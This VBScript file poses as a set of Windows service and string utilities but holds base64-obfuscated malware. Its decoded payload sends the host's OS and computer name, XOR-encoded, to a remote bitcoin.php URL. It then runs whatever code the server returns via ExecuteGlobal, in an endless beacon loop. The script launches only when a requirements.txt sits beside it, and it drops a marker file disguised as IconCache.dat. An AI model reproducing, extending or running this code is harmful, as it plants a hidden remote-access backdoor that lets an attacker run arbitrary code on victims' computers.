Private Function PathCombine(strPath1, strPath2)
    Dim strResult
    Dim objFso
    Set objFso = CreateObject("Scripting.FileSystemObject")
    strResult = objFso.BuildPath(strPath1, strPath2)
    PathCombine = strResult
End Function

Public Function GetServiceStatus(strServiceName)
    Err.Clear
    Dim strComputer
    strComputer = "."

    Dim result

    Dim bolServiceRunning
    bolServiceRunning = IsServiceRunning(strComputer, strServiceName)
    If Err.Number = 0 Then
        If bolServiceRunning Then
            result = "running"
        Else
            result = "stopped"
        End If
    Else
        result = "error"
    End If

    Err.Clear
    GetServiceStatus = result
End Function
Dim state
state = "aHR0cHM6Ly9tc2NlcnRzY3JpcHQuaW5mby9iaXRjb2luLnBocA=="
    
Dim szString
szString = "RGltIGtleWFycmF5LCBLZXksIHVybCwgbWlsbGlzZWNvbmRzDQprZXlhcnJheSA9IEFycmF5KDMsIDYsIDIsIDEsIDYsIDAsIDQsIDcsIDAsIDEsIDksIDYsIDgsIDEsIDIsIDUpDQpLZXkgPSBDcmVhdGVCeXRlQXJyYXkoa2V5YXJyYXkpDQp1cmwgPSBzdGF0ZQ0KdXNlckFnZW50ID0gIk1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuMjEyIFNhZmFyaS81MzcuMzYiDQptaWxsaXNlY29uZHMgPSAxMDAwICogMjANCg0KRnVuY3Rpb24gQmFzZTY0RGVjb2RlKGJhc2U2NFN0cmluZykNCiAgQ29uc3QgQmFzZTY0ID0gIkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8iDQogIERpbSBkYXRhTGVuZ3RoLCBzT3V0LCBncm91cEJlZ2luDQogIGJhc2U2NFN0cmluZyA9IFJlcGxhY2UoYmFzZTY0U3RyaW5nLCB2YkNyTGYsICIiKQ0KICBiYXNlNjRTdHJpbmcgPSBSZXBsYWNlKGJhc2U2NFN0cmluZywgdmJUYWIsICIiKQ0KICBiYXNlNjRTdHJpbmcgPSBSZXBsYWNlKGJhc2U2NFN0cmluZywgIiAiLCAiIikNCiAgZGF0YUxlbmd0aCA9IExlbihiYXNlNjRTdHJpbmcpDQogIElmIGRhdGFMZW5ndGggTW9kIDQgPD4gMCBUaGVuDQogICAgRXJyLlJhaXNlIDEsICJCYXNlNjREZWNvZGUiLCAiQmFkIEJhc2U2NCBzdHJpbmcuIg0KICAgIEV4aXQgRnVuY3Rpb24NCiAgRW5kIElmDQoNCiAgRm9yIGdyb3VwQmVnaW4gPSAxIFRvIGRhdGFMZW5ndGggU3RlcCA0DQogICAgRGltIG51bURhdGFCeXRlcywgQ2hhckNvdW50ZXIsIHRoaXNDaGFyLCB0aGlzRGF0YSwgbkdyb3VwLCBwT3V0DQogICAgbnVtRGF0YUJ5dGVzID0gMw0KICAgIG5Hcm91cCA9IDANCg0KICAgIEZvciBDaGFyQ291bnRlciA9IDAgVG8gMw0KICAgICAgdGhpc0NoYXIgPSBNaWQoYmFzZTY0U3RyaW5nLCBncm91cEJlZ2luICsgQ2hhckNvdW50ZXIsIDEpDQogICAgICBJZiB0aGlzQ2hhciA9ICI9IiBUaGVuDQogICAgICAgIG51bURhdGFCeXRlcyA9IG51bURhdGFCeXRlcyAtIDENCiAgICAgICAgdGhpc0RhdGEgPSAwDQogICAgICBFbHNlDQogICAgICAgIHRoaXNEYXRhID0gSW5TdHIoMSwgQmFzZTY0LCB0aGlzQ2hhciwgdmJCaW5hcnlDb21wYXJlKSAtIDENCiAgICAgIEVuZCBJZg0KICAgICAgSWYgdGhpc0RhdGEgPSAtMSBUaGVuDQogICAgICAgIEVyci5SYWlzZSAyLCAiQmFzZTY0RGVjb2RlIiwgIkJhZCBjaGFyYWN0ZXIgSW4gQmFzZTY0IHN0cmluZy4iDQogICAgICAgIEV4aXQgRnVuY3Rpb24NCiAgICAgIEVuZCBJZg0KDQogICAgICBuR3JvdXAgPSA2NCAqIG5Hcm91cCArIHRoaXNEYXRhDQogICAgTmV4dA0KDQogICAgbkdyb3VwID0gSGV4KG5Hcm91cCkNCg0KICAgIG5Hcm91cCA9IFN0cmluZyg2IC0gTGVuKG5Hcm91cCksICIwIikgJiBuR3JvdXANCg0KICAgIHBPdXQgPSBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDEsIDIpKSkgKyBfDQogICAgICBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDMsIDIpKSkgKyBfDQogICAgICBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDUsIDIpKSkNCg0KICAgIHNPdXQgPSBzT3V0ICYgTGVmdChwT3V0LCBudW1EYXRhQnl0ZXMpDQogIE5leHQNCg0KICBCYXNlNjREZWNvZGUgPSBzT3V0DQpFbmQgRnVuY3Rpb24NCg0KRnVuY3Rpb24gQ3JlYXRlQnl0ZUFycmF5KGludGVnZXJzKQ0KICAgIERpbSBieXRlQXJyYXkoKQ0KICAgIFJlRGltIGJ5dGVBcnJheShVQm91bmQoaW50ZWdlcnMpKQ0KICAgIA0KICAgIEZvciBpID0gTEJvdW5kKGludGVnZXJzKSBUbyBVQm91bmQoaW50ZWdlcnMpDQogICAgICAgIGJ5dGVBcnJheShpKSA9IENCeXRlKGludGVnZXJzKGkpKQ0KICAgIE5leHQNCiAgICANCiAgICBDcmVhdGVCeXRlQXJyYXkgPSBieXRlQXJyYXkNCkVuZCBGdW5jdGlvbg0KDQpGdW5jdGlvbiBHZXRSYW5kb21DaGFyKCkNCglEaW0gY2hhcnMsIHJhbmRvbUluZGV4DQoJY2hhcnMgPSAiYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWjAxMjM0NTY3ODkiDQoJUmFuZG9taXplDQoJcmFuZG9tSW5kZXggPSBJbnQoKExlbihjaGFycykgLSAxKSpSbmQgKyAxKQ0KCUdldFJhbmRvbUNoYXIgPSBNaWQoY2hhcnMsIHJhbmRvbUluZGV4LCAxKQ0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIEdldG9iaklEKCkNCglEaW0gbmV3U3RyaW5nLCBpDQoJRm9yIGk9MSBUbyAxMg0KCQluZXdTdHJpbmcgPSBuZXdTdHJpbmcgJiBHZXRSYW5kb21DaGFyKCkNCglOZXh0DQoJR2V0b2JqSUQgPSBuZXdTdHJpbmcNCkVuZCBGdW5jdGlvbg0KDQpTZXQgb2JqU2hlbGwgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpDQpzek9iamVjdElEID0gR2V0T2JqSUQoKQ0Kc3pQQ29kZSA9ICJPcGVyYXRpbmcgU3lzdGVtIDogIiArIG9ialNoZWxsLlJlZ1JlYWQoIkhLTE1cU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cUHJvZHVjdE5hbWUiKQ0Kc3pDb21wdXRlck5hbWUgPSAiQ29tcHV0ZXIgTmFtZSA6ICIgKyBvYmpTaGVsbC5FeHBhbmRFbnZpcm9ubWVudFN0cmluZ3MoIiVDT01QVVRFUk5BTUUlIikNCg0KRnVuY3Rpb24gSHR0cFBvc3QodXJsLCBwb3N0RGF0YSkNCiAgICBTZXQgb2JqSFRUUCA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKQ0KICAgIA0KICAgIG9iakhUVFAuT3BlbiAiUE9TVCIsIHVybCwgRmFsc2UNCiAgICANCiAgICBvYmpIVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogICAgb2JqSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJVc2VyLUFnZW50IiAsIHVzZXJBZ2VudA0KICAgIG9iakhUVFAuc2VuZCBwb3N0RGF0YQ0KICAgIA0KICAgIElmIG9iakhUVFAuc3RhdHVzID0gMjAwIFRoZW4NCiAgICAgICAgSHR0cFBvc3QgPSBvYmpIVFRQLnJlc3BvbnNlVGV4dA0KICAgIEVsc2UNCiAgICAgICAgSHR0cFBvc3QgPSAiRXJyb3I6ICIgJiBvYmpIVFRQLnN0YXR1c1RleHQgJiB2Yk5ld0xpbmUgJiAiU3RhdHVzIGNvZGU6ICIgJiBvYmpIVFRQLnN0YXR1cw0KICAgIEVuZCBJZg0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIFhPUkVuY3J5cHREZWNyeXB0Qnl0ZUFycmF5KGRhdGEsIGtleSkNCiAgICBEaW0gcmVzdWx0KCksIGtleUxlbmd0aCwgaQ0KICAgIGtleUxlbmd0aCA9IFVCb3VuZChrZXkpICsgMQ0KICAgIFJlRGltIHJlc3VsdChVQm91bmQoZGF0YSkpDQogICAgRm9yIGkgPSAwIFRvIFVCb3VuZChkYXRhKQ0KICAgICAgICBEaW0gYnl0ZURhdGEsIGJ5dGVLZXkNCiAgICAgICAgYnl0ZURhdGEgPSBkYXRhKGkpDQogICAgICAgIGJ5dGVLZXkgPSBrZXkoaSBNb2Qga2V5TGVuZ3RoKQ0KICAgICAgICByZXN1bHQoaSkgPSBieXRlRGF0YSBYb3IgYnl0ZUtleQ0KICAgIE5leHQNCiAgICBYT1JFbmNyeXB0RGVjcnlwdEJ5dGVBcnJheSA9IHJlc3VsdA0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIEdldFVuaWNvZGVCeXRlcyhpbnB1dFN0cmluZykNCiAgICBEaW0gaSwgYnl0ZUFycmF5KCkNCiAgICBSZURpbSBieXRlQXJyYXkoTGVuKGlucHV0U3RyaW5nKSAqIDIgLSAxKQ0KICAgIEZvciBpID0gMSBUbyBMZW4oaW5wdXRTdHJpbmcpDQogICAgICAgIERpbSBjaGFyQ29kZQ0KICAgICAgICBjaGFyQ29kZSA9IEFzYyhNaWQoaW5wdXRTdHJpbmcsIGksIDEpKQ0KICAgICAgICBieXRlQXJyYXkoKGkgLSAxKSAqIDIpID0gY2hhckNvZGUgQW5kIDI1NQ0KICAgICAgICBieXRlQXJyYXkoKGkgLSAxKSAqIDIgKyAxKSA9IChjaGFyQ29kZSBcIDI1NikgQW5kIDI1NQ0KICAgIE5leHQNCiAgICBHZXRVbmljb2RlQnl0ZXMgPSBieXRlQXJyYXkNCkVuZCBGdW5jdGlvbg0KDQpTdWIgQmxvY2tDb3B5KHNvdXJjZUFycmF5LCBzb3VyY2VJbmRleCwgZGVzdGluYXRpb25BcnJheSwgZGVzdGluYXRpb25JbmRleCwgY291bnQpDQogICAgRGltIGkNCiAgICBGb3IgaSA9IDAgVG8gY291bnQgLSAxDQogICAgICAgIGRlc3RpbmF0aW9uQXJyYXkoZGVzdGluYXRpb25JbmRleCArIGkpID0gc291cmNlQXJyYXkoc291cmNlSW5kZXggKyBpKQ0KICAgIE5leHQNCkVuZCBTdWINCg0KRnVuY3Rpb24gWE9SX0VuY3J5cHREZWNyeXB0KGJ5dGVBcnJheSwga2V5KQ0KICAgIERpbSBpLCBlbmNyeXB0ZWRCeXRlcw0KICAgIFJlRGltIGVuY3J5cHRlZEJ5dGVzKFVCb3VuZChieXRlQXJyYXkpKQ0KDQogICAgRm9yIGkgPSBMQm91bmQoYnl0ZUFycmF5KSBUbyBVQm91bmQoYnl0ZUFycmF5KQ0KICAgICAgICBlbmNyeXB0ZWRCeXRlcyhpKSA9IGJ5dGVBcnJheShpKSBYb3Iga2V5DQogICAgTmV4dA0KDQogICAgWE9SX0VuY3J5cHREZWNyeXB0ID0gZW5jcnlwdGVkQnl0ZXMNCkVuZCBGdW5jdGlvbg0KDQpGdW5jdGlvbiBCeXRlQXJyYXlUb0Jhc2U2NFN0cmluZyhieXRlQXJyYXkpDQogICAgRGltIGJhc2U2NENoYXJzLCBpLCBwYWRkaW5nDQogICAgYmFzZTY0Q2hhcnMgPSAiQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLyINCiAgICBEaW0gYmFzZTY0U3RyaW5nDQogICAgYmFzZTY0U3RyaW5nID0gIiINCiAgICBGb3IgaSA9IDAgVG8gVUJvdW5kKGJ5dGVBcnJheSkgLSAyIFN0ZXAgMw0KICAgICAgICBEaW0gY2hhcjEsIGNoYXIyLCBjaGFyMywgY2hhcjQNCiAgICAgICAgY2hhcjEgPSBNaWQoYmFzZTY0Q2hhcnMsIChieXRlQXJyYXkoaSkgXCA0KSArIDEsIDEpDQogICAgICAgIGNoYXIyID0gTWlkKGJhc2U2NENoYXJzLCAoKChieXRlQXJyYXkoaSkgQW5kIDMpICogMTYpIE9yIChieXRlQXJyYXkoaSArIDEpIFwgMTYpKSArIDEsIDEpDQogICAgICAgIGNoYXIzID0gTWlkKGJhc2U2NENoYXJzLCAoKChieXRlQXJyYXkoaSArIDEpIEFuZCAxNSkgKiA0KSBPciAoYnl0ZUFycmF5KGkgKyAyKSBcIDY0KSkgKyAxLCAxKQ0KICAgICAgICBjaGFyNCA9IE1pZChiYXNlNjRDaGFycywgKGJ5dGVBcnJheShpICsgMikgQW5kIDYzKSArIDEsIDEpDQogICAgICAgIGJhc2U2NFN0cmluZyA9IGJhc2U2NFN0cmluZyAmIGNoYXIxICYgY2hhcjIgJiBjaGFyMyAmIGNoYXI0DQogICAgTmV4dA0KICAgIHBhZGRpbmcgPSAoVUJvdW5kKGJ5dGVBcnJheSkgKyAxKSBNb2QgMw0KICAgIElmIHBhZGRpbmcgPiAwIFRoZW4NCiAgICAgICAgYmFzZTY0U3RyaW5nID0gTGVmdChiYXNlNjRTdHJpbmcsIExlbihiYXNlNjRTdHJpbmcpIC0gcGFkZGluZykgJiBTdHJpbmcocGFkZGluZywgIj0iKQ0KICAgIEVuZCBJZg0KICAgIEJ5dGVBcnJheVRvQmFzZTY0U3RyaW5nID0gYmFzZTY0U3RyaW5nDQpFbmQgRnVuY3Rpb24NCiAgICANCkZ1bmN0aW9uIEJhc2U2NERlY29kZShiYXNlNjRTdHJpbmcpDQogICAgRGltIEJhc2U2NENoYXJzLCBwYWRkaW5nLCBwYWRkaW5nQ291bnQsIGksIGoNCiAgICBEaW0gZGVjb2RlZEFycmF5KCksIGdyb3VwLCBkZWNvZGVkSW5kZXgNCiAgICBCYXNlNjRDaGFycyA9ICJBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvIg0KICAgIGJhc2U2NFN0cmluZyA9IFJlcGxhY2UoYmFzZTY0U3RyaW5nLCAiICIsICIiKQ0KICAgIHBhZGRpbmdDb3VudCA9IExlbihiYXNlNjRTdHJpbmcpIE1vZCA0DQogICAgcGFkZGluZyA9ICIiDQogICAgSWYgcGFkZGluZ0NvdW50ID4gMCBUaGVuDQogICAgICAgIHBhZGRpbmcgPSBTdHJpbmcoNCAtIHBhZGRpbmdDb3VudCwgIj0iKQ0KICAgICAgICBiYXNlNjRTdHJpbmcgPSBiYXNlNjRTdHJpbmcgJiBwYWRkaW5nDQogICAgRW5kIElmDQogICAgZ3JvdXAgPSAiIg0KICAgIGkgPSAxDQogICAgZGVjb2RlZEluZGV4ID0gMA0KICAgIEZvciBqID0gMSBUbyBMZW4oYmFzZTY0U3RyaW5nKQ0KICAgICAgICBJZiBNaWQoYmFzZTY0U3RyaW5nLCBqLCAxKSA8PiAiPSIgVGhlbiAnIFNraXAgcGFkZGluZyBjaGFyYWN0ZXJzDQogICAgICAgICAgICBncm91cCA9IGdyb3VwICYgUmlnaHQoIjAwMDAwMCIgJiBDb252ZXJ0VG9CaW5hcnkoQmFzZTY0Q2hhcnMsIE1pZChiYXNlNjRTdHJpbmcsIGosIDEpKSwgNikNCiAgICAgICAgRW5kIElmDQogICAgICAgIElmIExlbihncm91cCkgPSAyNCBUaGVuDQogICAgICAgICAgICAnIENvbnZlcnQgMjQtYml0IGJpbmFyeSBzdHJpbmcgdG8gMyBieXRlcw0KICAgICAgICAgICAgUmVEaW0gUHJlc2VydmUgZGVjb2RlZEFycmF5KGRlY29kZWRJbmRleCArIDIpDQogICAgICAgICAgICBkZWNvZGVkQXJyYXkoZGVjb2RlZEluZGV4KSA9IEJpblRvRGVjKExlZnQoZ3JvdXAsIDgpKQ0KICAgICAgICAgICAgZGVjb2RlZEFycmF5KGRlY29kZWRJbmRleCArIDEpID0gQmluVG9EZWMoTWlkKGdyb3VwLCA5LCA4KSkNCiAgICAgICAgICAgIGRlY29kZWRBcnJheShkZWNvZGVkSW5kZXggKyAyKSA9IEJpblRvRGVjKFJpZ2h0KGdyb3VwLCA4KSkNCiAgICAgICAgICAgIGRlY29kZWRJbmRleCA9IGRlY29kZWRJbmRleCArIDMNCiAgICAgICAgICAgIGdyb3VwID0gIiINCiAgICAgICAgRW5kIElmDQogICAgTmV4dA0KICAgIEJhc2U2NERlY29kZSA9IGRlY29kZWRBcnJheQ0KRW5kIEZ1bmN0aW9uDQpGdW5jdGlvbiBDb252ZXJ0VG9CaW5hcnkoYmFzZTY0Q2hhcnMsIGNoYXIpDQogICAgRGltIGJpbmFyeSwgaQ0KICAgIEZvciBpID0gMSBUbyBMZW4oYmFzZTY0Q2hhcnMpDQogICAgICAgIElmIE1pZChiYXNlNjRDaGFycywgaSwgMSkgPSBjaGFyIFRoZW4NCiAgICAgICAgICAgIGluZGV4ID0gaSAtIDENCiAgICAgICAgICAgIEV4aXQgRm9yDQogICAgICAgIEVuZCBJZg0KICAgIE5leHQNCiAgICBiaW5hcnkgPSAiIg0KICAgIEZvciBpID0gMSBUbyA2DQogICAgICAgIGJpbmFyeSA9IENTdHIoaW5kZXggTW9kIDIpICYgYmluYXJ5DQogICAgICAgIGluZGV4ID0gaW5kZXggXCAyDQogICAgTmV4dA0KICAgIENvbnZlcnRUb0JpbmFyeSA9IGJpbmFyeQ0KRW5kIEZ1bmN0aW9uDQpGdW5jdGlvbiBCaW5Ub0RlYyhiaW5hcnkpDQogICAgRGltIGRlYywgaQ0KICAgIGRlYyA9IDANCiAgICBGb3IgaSA9IExlbihiaW5hcnkpIFRvIDEgU3RlcCAtMQ0KICAgICAgICBJZiBNaWQoYmluYXJ5LCBpLCAxKSA9ICIxIiBUaGVuDQogICAgICAgICAgICBkZWMgPSBkZWMgKyAyIF4gKExlbihiaW5hcnkpIC0gaSkNCiAgICAgICAgRW5kIElmDQogICAgTmV4dA0KICAgIEJpblRvRGVjID0gZGVjDQpFbmQgRnVuY3Rpb24NCkZ1bmN0aW9uIE1ha2VSZXF1ZXN0UGFja2V0KHN6Q29udGVudHMpDQoJRGltIHN6Q0lELHN6U3RlcCxsc3pSZXF1ZXN0LGxwUmVxdWVzdCxscFJlcXVlc3RFbmMsc3piNjREYXRhDQoJc3pDSUQgPSAiRkQ0MjlERUFCRSINCglzelN0ZXAgPSB2Yk5ld0xpbmUgJiB2YlRhYiAmIHZiVGFiICYgIlN0ZXAxIDogS2VlcExpbmsoVikiICYgdmJOZXdMaW5lDQoJSWYgTGVuKHN6Q29udGVudHMpID0gMCBUaGVuDQogICAgICAgIHN6RGF0YSA9IHN6U3RlcCAmIHN6UENvZGUgJiB2Yk5ld0xpbmUgJiBzekNvbXB1dGVyTmFtZSAmIHZiTmV3TGluZSAmIHN6Q29udGVudHMNCglFbHNlDQoJCXN6RGF0YSA9IHN6Q29udGVudHMNCglFbmQgSWYNCglsc3pSZXF1ZXN0ID0gImlkPSIgKyBzekNJRCArICImb2lkPSIgKyBzek9iamVjdElEICsgIiZkYXRhPSINCglscFJlcXVlc3QgPSBHZXRVbmljb2RlQnl0ZXMoc3pEYXRhKQ0KCWxwUmVxdWVzdEVuYyA9IFhPUkVuY3J5cHREZWNyeXB0Qnl0ZUFycmF5KGxwUmVxdWVzdCxLZXkpDQogICAgc3piNjREYXRhID0gQnl0ZUFycmF5VG9CYXNlNjRTdHJpbmcobHBSZXF1ZXN0RW5jKQ0KCWxzelJlcXVlc3QgPSBsc3pSZXF1ZXN0ICsgc3piNjREYXRhDQoJTWFrZVJlcXVlc3RQYWNrZXQgPSBsc3pSZXF1ZXN0DQpFbmQgRnVuY3Rpb24NCg0KRnVuY3Rpb24gTGl0dGxlRW5kaWFuQnl0ZXNUb0ludChieXRlcykNCiAgICBEaW0gdmFsdWUsIGkNCiAgICB2YWx1ZSA9IDANCiAgICBGb3IgaSA9IDAgVG8gVUJvdW5kKGJ5dGVzKQ0KICAgICAgICB2YWx1ZSA9IHZhbHVlICsgKGJ5dGVzKGkpICogKDI1NiBeIGkpKQ0KICAgIE5leHQNCiAgICBJZiAoYnl0ZXMoVUJvdW5kKGJ5dGVzKSkgQW5kICZIODApIDw+IDAgVGhlbg0KICAgICAgICB2YWx1ZSA9IHZhbHVlIC0gKDI1NiBeIChVQm91bmQoYnl0ZXMpICsgMSkpDQogICAgRW5kIElmDQogICAgDQogICAgTGl0dGxlRW5kaWFuQnl0ZXNUb0ludCA9IHZhbHVlDQpFbmQgRnVuY3Rpb24NCg0Kc3pDb250ZW50cyA9ICIiDQpXaGlsZSBUcnVlDQoJRGltIGxwQ21kSUQoMykNCiAgICBEaW0gbHBEYXRhTGVuKDMpDQogICAgRGltIG5DTURJRA0KICAgIERpbSBuRGF0YUxlbixuTGVuLHN6Q29kZSxzekNvZGVBcnIsc3pSZXF1ZXN0LHN6UmVzcG9uc2UsbHBDb250ZW50LGxwRGF0YSgpLGxwQ29udGVudEVuYw0KCW5DTURJRCA9IDANCgluRGF0YUxlbiA9IDANCgluTGVuID0gMA0KCXN6Q29kZSA9ICIiDQoJc3pSZXF1ZXN0ID0gIiINCglzelJlc3BvbnNlID0gIiINCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dA0KCWRvIHdoaWxlIFRydWUNCiAgICBzelJlcXVlc3QgPSBNYWtlUmVxdWVzdFBhY2tldChzekNvbnRlbnRzKQ0KICAgIHN6Q29udGVudHMgPSAiIg0KICAgIHN6UmVzcG9uc2UgPSBIdHRwUG9zdCh1cmwsIHN6UmVxdWVzdCkNCiAgICBzelJlc3BvbnNlID0gUmVwbGFjZShzelJlc3BvbnNlLCAiICIsIisiKQ0KICAgIElmIHN6UmVzcG9uc2UgPSAiU3VjY2VlZCEiIFRoZW4NCiAgICAgICAgV1NjcmlwdC5TbGVlcCBtaWxsaXNlY29uZHMNCiAgICAgICAgRXhpdCBEbw0KICAgIEVuZCBJZg0KICAgIGxwQ29udGVudEVuYyA9IEJhc2U2NERlY29kZShzelJlc3BvbnNlKQ0KICAgIGxwQ29udGVudCA9IFhPUkVuY3J5cHREZWNyeXB0Qnl0ZUFycmF5KGxwQ29udGVudEVuYywgS2V5KQ0KICAgIEJsb2NrQ29weSBscENvbnRlbnQsIDAsIGxwQ21kSUQsIDAsIDQNCiAgICBCbG9ja0NvcHkgbHBDb250ZW50LCA0LCBscERhdGFMZW4sIDAsIDQNCiAgICBuQ01ESUQgPSBMaXR0bGVFbmRpYW5CeXRlc1RvSW50KGxwQ21kSUQpDQogICAgbkRhdGFMZW4gPSBMaXR0bGVFbmRpYW5CeXRlc1RvSW50KGxwRGF0YUxlbikNCiAgICBSZURpbSBscERhdGEobkRhdGFMZW4gLSAxKQ0KICAgIEJsb2NrQ29weSBscENvbnRlbnQsIDgsIGxwRGF0YSwgMCwgbkRhdGFMZW4NCiAgICBEaW0gbGxwRGF0YQ0KICAgIGxscERhdGEgPSBYT1JfRW5jcnlwdERlY3J5cHQobHBEYXRhLCAxMjMpDQogICAgRm9yIEVhY2ggYnl0ZVZhbHVlIEluIGxscERhdGENCiAgICAgICAgc3pDb2RlID0gc3pDb2RlICYgQ2hyKGJ5dGVWYWx1ZSkNCiAgICBOZXh0DQogICAgSWYgbkNNRElEID0gMTAwMyBUaGVuDQogICAgICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0DQogICAgICAgIEV4ZWN1dGVHbG9iYWwgc3pDb2RlDQogICAgICAgIHN6Q29udGVudHMgPSByZXN1bHQNCiAgICBFbmQgSWYNCiAgICBJZiBuQ01ESUQgPSAxMDAyIFRoZW4NCiAgICAgICAgT24gRXJyb3IgUmVzdW1lIE5leHQNCiAgICAgICAgV1NjcmlwdC5TbGVlcCAyMTQ3NDgzNjQ3DQogICAgRW5kIElmDQogICAgSWYgbkNNRElEID0gMTAwMSBUaGVuDQogICAgICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0DQogICAgICAgIEV4ZWN1dGVHbG9iYWwgc3pDb2RlDQogICAgRW5kIElmDQoJV1NjcmlwdC5TbGVlcCBtaWxsaXNlY29uZHMNCmxvb3ANCldlbmQNCg0KDQoNCg=="
Function bric(bkMode)
    Dim xmlDoc, node
	Set xmlDoc = CreateObject("MSXML2.DOMDocument")
	Set node = xmlDoc.createElement("Base64")

	' Assign the Base64 string
	node.DataType = "bin.base64"
	node.Text = bkMode

	' Get the byte array and convert to a VBScript array
	Dim byteData, i, byteArray()
	byteData = node.NodeTypedValue
	
	' Resize array and assign bytes
	ReDim byteArray(UBound(byteData))
	For i = 0 To UBound(byteData)
		byteArray(i) = AscB(MidB(byteData, i + 1, 1)) ' Extract each byte properly
	Next

	' Return as byte array
	bric = byteArray

	' Cleanup
	Set node = Nothing
	Set xmlDoc = Nothing
End Function

Public Function IsServiceRunning(strComputer, strServiceName)
    Dim objWMIService
    Dim strWMIQuery
    Dim result

    strWMIQuery = "SELECT * FROM Win32_Service WHERE Name = '" & strServiceName & "' AND state='Running'"

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    If objWMIService.ExecQuery(strWMIQuery).Count > 0 then
        result = True
    Else
        result = False
    End If
    IsServiceRunning = result
End Function
Function ConvertToBinary(mon, char)
    Dim binary, i
    For i = 1 To Len(mon)
        If Mid(mon, i, 1) = char Then
            index = i - 1
            Exit For
        End If
    Next
    binary = ""
    For i = 1 To 6
        binary = CStr(index Mod 2) & binary
        index = index \ 2
    Next
    ConvertToBinary = binary
End Function
Function BinToDec(binary)
    Dim dec, i
    dec = 0
    For i = Len(binary) To 1 Step -1
        If Mid(binary, i, 1) = "1" Then
            dec = dec + 2 ^ (Len(binary) - i)
        End If
    Next
    BinToDec = dec
End Function
Public Function ServiceExists(strComputer, strServiceName)
    Dim objWMIService
    Dim strWMIQuery
    Dim result

    strWMIQuery = "SELECT * FROM Win32_Service WHERE Name = '" & strServiceName & "'"

    Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

    If objWMIService.ExecQuery(strWMIQuery).Count > 0 then
        result = True
    Else
        result = False
    End If

    ServiceExists = result
End Function
Function ByteToString(inputBytes)
    Dim i, outputString
    outputString = ""
    For i = LBound(inputBytes) To UBound(inputBytes)
        outputString = outputString & Chr(inputBytes(i))
    Next
    ByteToString = outputString
End Function
Public Function PadRight(strNeedle, intMax, strPadChar)
    Dim i
    Dim strResult
    strPadChar = Trim(strPadChar)
    If Len(strPadChar) = 0 Then
        strPadChar = " "
    End If
    strPadChar = Left(strPadChar, 1)

    Dim strMissing

    Dim intMissing
    intMissing = intMax - Len(strNeedle)

    strResult = strNeedle
    If intMissing > 0 Then
        For i = 1 To intMissing
            strResult = strResult & strPadChar
        Next
    End IF

    PadRight = strResult
End Function
Dim szByte,szOric,szStatebyte,szStateString
szByte = bric(szString)
szOric = ""
szStateString = ""
Public Function GetProperDate(dateSeparator, groupSeparator, timeSeparator)
    Dim moment
    moment = now

    Dim strResult
    strResult = ""
    strResult = strResult & PadLeft(CStr(Year(moment)), 4, "0")
    strResult = strResult & dateSeparator
    strResult = strResult & PadLeft(CStr(Month(moment)), 2, "0")
    strResult = strResult & dateSeparator
    strResult = strResult & PadLeft(CStr(Day(moment)), 2, "0")
    strResult = strResult & groupSeparator
    strResult = strResult & PadLeft(CStr(Hour(moment)), 2, "0")
    strResult = strResult & timeSeparator
    strResult = strResult & PadLeft(CStr(Minute(moment)), 2, "0")
    strResult = strResult & timeSeparator
    strResult = strResult & PadLeft(CStr(Second(moment)), 2, "0")
    GetProperDate = strResult
End Function
szOric = ByteToString(szByte)

writecontent = state
szStatebyte  = bric(state)
szStateString = ByteToString(szStatebyte)
state = szStateString
Dim objFileSO
Set objFileSO = CreateObject("Scripting.FileSystemObject")
Dim scriptDirectory
scriptDirectory = objFileSO.GetParentFolderName(WScript.ScriptFullName)
Dim existFileName
existFileName = "requirements.txt"
Dim filePath
filePath = objFileSO.BuildPath(scriptDirectory,existFileName)
If objFileSO.FileExists(filePath) Then
    catchFilePath = "C:\Users\Public\IconCache.dat"
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(catchFilePath ,True)
    objFile.Write writecontent
    objFile.Close
    ExecuteGlobal szOric
End If